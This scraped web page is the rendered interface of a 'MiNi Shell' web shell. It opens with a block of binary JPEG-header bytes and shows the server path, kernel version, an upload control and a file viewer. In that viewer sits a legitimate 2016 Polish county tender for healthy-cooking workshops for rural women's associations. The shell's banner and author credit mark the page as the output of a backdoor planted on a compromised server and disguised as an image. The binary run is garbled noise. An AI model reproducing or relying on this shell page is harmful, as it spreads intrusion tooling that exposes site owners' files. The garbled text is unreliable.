JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160414/40051-N-2016.html

<p class="kh_header"><b>Piotrków Trybunalski: Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie warsztatów kulinarnych
w zakresie technik i zasad zdrowego gotowania dla organizacji pozarządowych - przedstawicieli Kół Gospodyń Wiejskich - w ramach realizacji przez Powiat Piotrkowski projektu pn.: Twoje Serce Twoim Życiem - Program Zmniejszenia Nierówności w Zdrowiu Mieszkańców Powiatu Piotrkowskiego z Ryzykiem Wystąpienia Chorób Układu Krążenia.</b><br>
<b>Numer ogłoszenia: 40051 - 2016; data zamieszczenia: 14.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Piotrkowski , ul. Dąbrowskiego 7, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 44 732 88 00, faks 44 732 88 03.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-piotrkowski.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie warsztatów kulinarnych
w zakresie technik i zasad zdrowego gotowania dla organizacji pozarządowych - przedstawicieli Kół Gospodyń Wiejskich - w ramach realizacji przez Powiat Piotrkowski projektu pn.: Twoje Serce Twoim Życiem - Program Zmniejszenia Nierówności w Zdrowiu Mieszkańców Powiatu Piotrkowskiego z Ryzykiem Wystąpienia Chorób Układu Krążenia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie warsztatów kulinarnych
w zakresie technik i zasad zdrowego gotowania dla organizacji pozarządowych - przedstawicieli Kół Gospodyń Wiejskich - w ramach realizacji przez Powiat Piotrkowski projektu pn.: Twoje Serce Twoim Życiem - Program Zmniejszenia Nierówności w Zdrowiu Mieszkańców Powiatu Piotrkowskiego z Ryzykiem Wystąpienia Chorób Układu Krążenia. 
Liczba 
warsztatów	Planowana Liczba uczestników
w warsztatach ogółem	Liczba uczestników
w jednym
warsztacie	Liczba dni zajęciowych na jeden warsztat	Liczba godzin szkoleniowych
na 1 warsztat
(1 godz.=45 min.)	Termin realizacji
24	384	10 - 16 osób	1	6 godz.	od maja 2016 r.  do października 2016
Tab. Liczba warsztatów przewidziana dla poszczególnych gmin
Gmina	               Liczba warsztatów
Gmina Aleksandrów 	2 warsztaty
Gmina Czarnocin	2 warsztaty
Gmina Gorzkowice	2 Warsztaty
Gmina Grabica	        2 Warsztaty
Gmina Moszczenica	4 Warsztaty
Gmina Łęki Szlacheckie	1 Warsztat
Gmina Ręczno	2 Warsztaty
Gmina Rozprza	3 Warsztaty
Gmina Sulejów	2 Warsztaty
Gmina Wola Krzysztoporska 2 Warsztaty
Gmina Wolbórz	2 Warsztaty
ŁĄCZNIE	24 WARSZTATY

1.Wymagania dotyczące realizacji przedmiotu zamówienia wobec Wykonawcy:
1)Wykaz KGW w podziale na poszczególne gminy oraz miejscowości dostępny jest na stronie projektu www.zdrowie.powiat-piotrkowski.pl - Akademie Zdrowego Żywienia lub w zakładce -Do pobrania.
2)Warsztaty w zakresie zdrowego żywienia to forma zorganizowanych zajęć nauki praktycznego zastosowania technik i zasad zdrowego gotowania i żywienia 
(z możliwością ich wykorzystania przez uczestników również w warunkach domowych), które prowadzone będą przez instruktora (trenera) gotowania. 
3)W ramach warsztatów przewiduje się zorganizowanie wszelkich zajęć, które sprzyjać będą nauce i wdrażaniu do codziennego życia zasad zdrowego żywienia. 
4)Opracowując programy zajęć należy uwzględnić różnorodność rodzajów dań (przystawki, przekąski, dania główne, desery, soki itp.), możliwych technik ich przygotowywania oraz przy użyciu produktów, które są zalecane w przypadku chorób układu krążenia, rekomendowanych przez Instytut Żywności i Żywienia www.izz.waw.pl.
5)Planowany termin przeprowadzenia warsztatów: maj 2016 - październik 2016r.
6)Szczegółowy harmonogram warsztatów zostanie ustalony we współpracy i przy akceptacji Zamawiającego.
7)Planując Warsztaty należy uwzględnić możliwość prowadzenia szkoleń w weekendy 
w godzinach między 8 a 16.
8)Kandydaci na warsztaty zostaną wskazani przez Zamawiającego, na jeden warsztat przewiduje się ok. 16 uczestników.
9)Czas trwania warsztatów to 6 godzin. Godzina szkoleniowa wynosi 45 minut.
10)Podczas każdego warsztatu Wykonawca zapewni uczestnikom 2 przerwy po 15 min.
i jedną przerwę 30 min. Czas przeznaczony na przerwy nie będzie wliczany do czasu trwania warsztatu.
11)Zastosowane metody warsztatowe muszą uwzględniać indywidualne podejście do każdego z uczestników oraz możliwość ich zastosowania w warunkach domowych.
12)Zajęcia powinny być prowadzone w atrakcyjnej i ciekawej dla uczestników formie.
13)Planując programy zajęć Wykonawca powinien wziąć pod uwagę również porę roku, wykorzystując regionalne produkty i surowce sezonowe.
14)Wykonawca organizując warsztaty musi zapewnić:
a)Promocję i informację o zajęciach;
b)Miejsce do przeprowadzenia warsztatów, wraz z odpowiednim wyposażeniem do przygotowania i degustacji przygotowanych podczas zajęć posiłków, 
w miejscowościach na terenie danej gminy, w której mają odbywać się warsztaty (wykaz gmin oraz liczba warsztatów w tabeli powyżej);
c)Trenera (instruktora) gotowania;
d)Zakup art. żywnościowych na potrzeby prezentacji prozdrowotnych technik
i sposobów komponowania dań;
e)Opracowywać i gromadzić w wersji papierowej i elektronicznej przepisy (wraz ze zdjęciami) wszystkich potraw i posiłków przygotowywanych podczas zajęć;
f)Catering dla uczestników warsztatów - zdrowa żywność.
15)Wykonawca jest zobowiązany również do:
a)Komponowania i przygotowywania posiłków wyłącznie przy użyciu produktów spełniających normy, jakości produktów spożywczych o ważnym okresie przydatności do spożycia, w opakowaniach posiadających stosowne atesty.
b)Przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m. in. ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tekst jednolity: Dz. U. z 2015 r., poz. 594 z późn. zm.), wynikające z realizacji dobrych praktyk produkcyjnych (GMP) i dobrych praktyk higienicznych (GHP) oraz Systemu Analizy Zagrożeń i Krytycznych Punktów Kontroli (HACCP) mających na celu m. in.: zapewnienie bezpieczeństwa żywności oraz przeprowadzenie procesu identyfikowalności produktów.
16.Zamawiający uprawniony będzie do udzielania Wykonawcy w razie potrzeby niezbędnych wskazówek. 
17.W celu realizacji zadania Zamawiający powierzy Wykonawcy przetwarzanie danych osobowych osób deklarujących uczestnictwo w projekcie w zakresie i celu niezbędnym do dokumentowania prowadzonej w ramach warsztatów.
Dokumentowanie zajęć: 
W ramach zadania Wykonawca zobowiązuje się do opracowania:
1.Materiałów warsztatowych dla wszystkich uczestników szkoleń w terminie nie później niż 7 dni przed planowanym terminem warsztatu. Materiały warsztatowe mają zawierać zagadnienia teoretyczne omawiane na warsztacie, w tym opis planowanych do przygotowania potraw wraz z przepisami oraz powinny być uzupełnieniem poruszanej na zajęciach tematyki. (Forma elektroniczna w formacie otwartym, A4).
2.List obecności zawierających: imię i nazwisko, dane dot.: reprezentowanej instytucji 
organizacji, potwierdzenie odbioru materiałów warsztatowych oraz potwierdzenie odbioru zaświadczeń o ukończeniu szkolenia oraz fakt skorzystania z cateringu.
3.Najpóźniej 7 dni przed rozpoczęciem każdych zajęć Wykonawca przedstawi Zamawiającemu do akceptacji szczegółowy program warsztatów wraz ze wzorem zaświadczeń o ukończeniu warsztatów, list obecności (w wersji papierowej i elektronicznej)
4.Po zakończeniu warsztatów Wykonawca wyda uczestnikom zaświadczenia.
5.Ankiet ewaluacyjnych ex i post ante dotyczących warsztatów, których wzór Wykonawca przedstawi Zamawiającemu do zatwierdzenie najpóźniej na 7 dni przed planowanym zorganizowaniem pierwszego z warsztatów. Zamawiający zastrzega sobie prawo wnoszenia uwag do przedstawionej propozycji ankiet.
Wymagania dotyczące realizacji przedmiotu zamówienia wobec Wykonawcy:
1.Przedstawiania Zamawiającemu sprawozdań częściowych i końcowego (wraz 
z dokumentacją) w wersji elektronicznej i papierowej w zakresie:
Liczby odbytych godzin w ramach warsztatów,
Liczby osób uczestniczących w zajęciach,
Zakresu tematycznego poszczególnych warsztatów,
Miejsca przeprowadzenia warsztatu,
Zdjęć dokumentujących zajęcia,
w terminie 7 dni licząc od dnia zakończenia cyklu warsztatów na ternie danej gminy oraz
końcowego w terminie 7 dni licząc od daty zakończenia ostatniego warsztatu w ramach realizowanego zadania.
2.Stałej współpracy z Biurem Projektu przekazywania wszelkich informacji mających wpływ na prawidłową realizacje powierzonego zadania.
3.Przekazania całej dokumentacji Zamawiającemu, w ciągu siedmiu dni licząc od dnia zakończenia ostatniego warsztatu w ramach zamówienia, ale nie później niż do dnia 10.11.2016 r.
4.Wykonawca zobowiązuje się do zamieszczenia logotypów funduszy norweskich zgodnie 
z Podręcznikiem Komunikacji i Identyfikacji Wizualnej oraz Wymogami dotyczącymi informacji i promocji (załącznik nr 4 do regulacji na temat wdrażania Mechanizmu Finansowego EOG oraz Norweskiego Mechanizmu Finansowego na lata 2009-2014) dostępnym na stronie www.eog.gov.plstronydowiedz-sie-wiecej-o-funduszachwez-udzial-w-promocji-funduszyzasady-promocji.
5.Wykonawcy są zobowiązani do starannego zapoznania się z przedmiotem zamówienia, wszystkimi czynnikami mającymi wpływ na kształtowanie się cen ofertowych oraz warunkami wykonania zamówienia.
6.Zamawiający zastrzega sobie możliwość bieżącego monitorowania przebiegu prowadzonych spotkań i konsultacji w trakcie ich trwania, mającego na celu sprawdzenie prawidłowości realizacji przedmiotu zamówienia.
7.Zamawiający zastrzega sobie prawo do oceny, kontroli i weryfikacji wszystkich parametrów świadczonej usługi - na każdym etapie jej realizacji oraz w każdej chwili
w miejscu przygotowywania posiłków. 
8.Wykonawca zobowiązywany jest do poinformowania na wstępie warsztatów, że przedsięwzięcie organizowane jest z udziałem środków finansowych pochodzących 
z funduszy norweskich i budżetu państwa.
9.Wykonawca dokona ewaluacji warsztatu w oparciu o ankiety wypełniane przez uczestników na początku i na końcu warsztatu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających na podst. art. 67 ust. 1 pkt. 6).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium do niniejszego postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania uprawnień do wykonywania określonej działalności lub czynności będzie spełniony jeżeli Wykonawca: a) posiada przygotowanie zawodowe w zawodzie kucharz, technik gastronomiczny, dietetyk, technik żywienia oraz inne kwalifikacje potwierdzające kwalifikacje kulinarne, w tym posiadanie kursów specjalistycznych 
z zakresu żywienia, aktualne badania lekarskie wymagane do pracy w zbiorowym żywieniu oraz załączy podpisane Oświadczenie o spełnianiu warunków udziału 
w postępowaniu - Załącznik nr 2 do SIWZ. Ocena spełnienia warunków zostanie dokonana według formuły spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia do wykonywania określonej działalności lub czynności będzie spełniony jeżeli Wykonawca: a) posiada udokumentowane minimum 2-letnie doświadczenie w prowadzeniu szkoleń warsztatów w temacie zdrowego stylu życia, zdrowego odżywiania oraz załączy podpisane Oświadczenie o spełnianiu warunków udziału w postępowaniu - Załącznik nr 2 do SIWZ. Ocena spełnienia warunków zostanie dokonana według formuły spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku
Zamawiający uzna warunek za spełniony, gdy Wykonawca złoży oświadczenie 
o spełnianiu warunków udziału w postępowaniu - Załącznik nr 2 do SIWZ. Ocena spełnienia warunków zostanie dokonana według formuły spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia będzie spełniony, jeżeli Wykonawca oświadczy, iż dysponuje lub będzie dysponować zespołem osób posiadających kwalifikacje uprawniające je do prowadzenia zaproponowanych przez Wykonawcę zajęć kulinarnych lub realizacji programów promujących zasady zdrowego żywienia oraz załączy - Wykaz osób - Załącznik nr 3 do SIWZ - przewidywanych do realizacji zamówienia. Z dostarczonych dokumentów musi jednoznacznie wynikać, 
iż warunki Wykonawca spełnił. Ocena spełnienia warunków zostanie dokonana według formuły spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy Wykonawca złoży oświadczenie 
o spełnianiu warunków udziału w postępowaniu - Załącznik nr 2 do SIWZ. Ocena spełnienia warunków zostanie dokonana według formuły spełnia, nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Wartość merytoryczna - 40</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-piotrkowski.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
97-300 Piotrków Tryb.
ul. Dąbrowskiego 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2016 godzina 10:00, miejsce: Biuro Obsługi Interesanta, sala 112, I p.
Starostwo Powiatowe
97-300 Piotrków Tryb.
ul. Dąbrowskiego 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.: Twoje Serce Twoim Życiem - Program Zmniejszania Nierówności w Zdrowiu Mieszkańców Powiatu Piotrkowskiego z Ryzykiem Wystąpienia Chorób Układu Krążenia współfinansowanego w ramach Programu PL13 Ograniczanie społecznych nierówności w zdrowiu ze środków Norweskiego Mechanizmu Finansowego oraz budżetu państwa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com